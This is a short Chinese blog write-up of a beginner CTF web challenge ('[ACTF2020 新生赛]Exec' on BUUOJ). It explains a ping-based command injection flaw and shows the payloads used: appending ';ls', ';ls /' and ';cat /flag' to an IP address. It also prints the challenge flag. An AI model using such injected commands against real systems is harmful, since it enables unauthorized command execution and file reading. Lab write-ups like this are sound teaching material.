web-buuoj-[ACTF2020 新生赛]Exec

web安全 CTF实战 命令执行
CTF实战
发布日期:   2025-02-12
更新日期:   2025-02-12
文章字数:   216
阅读时长:   1 分
阅读次数:  

一、题面

  • 初步分析

页面体现出来的功能是让我们给一个ip地址然后通过ping命令测试连通性。

既然要使用ping命令那么必然会调用底层操作系统的命令,如果是简单的拼接用户的输入,那么就会造成命令执行漏洞。

二、解题

  • 漏洞测试
127.0.0.1;ls

可以看到回显出了当前目录下的文件index.php

说明在执行完ping 127.0.0.1之后又执行了ls命令,存在命令执行漏洞。

127.0.0.1;ls /

可以看到flag在根目录下。

  • 获取flag
127.0.0.1;cat /flag
flag{e347ca3a-317b-4f7f-8367-302b6e2eea21}

总结

本关考察的是最最基础的命令执行漏洞的情况,通过;后接系统命令即可达到执行任意命令的目的。

文章作者: 司晓凯
文章链接: http://sxksec.cn/2025/02/12/ctf-shi-zhan/web-buuoj-actf2020-xin-sheng-sai-exec/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 司晓凯 !
web安全 CTF实战 命令执行
  目录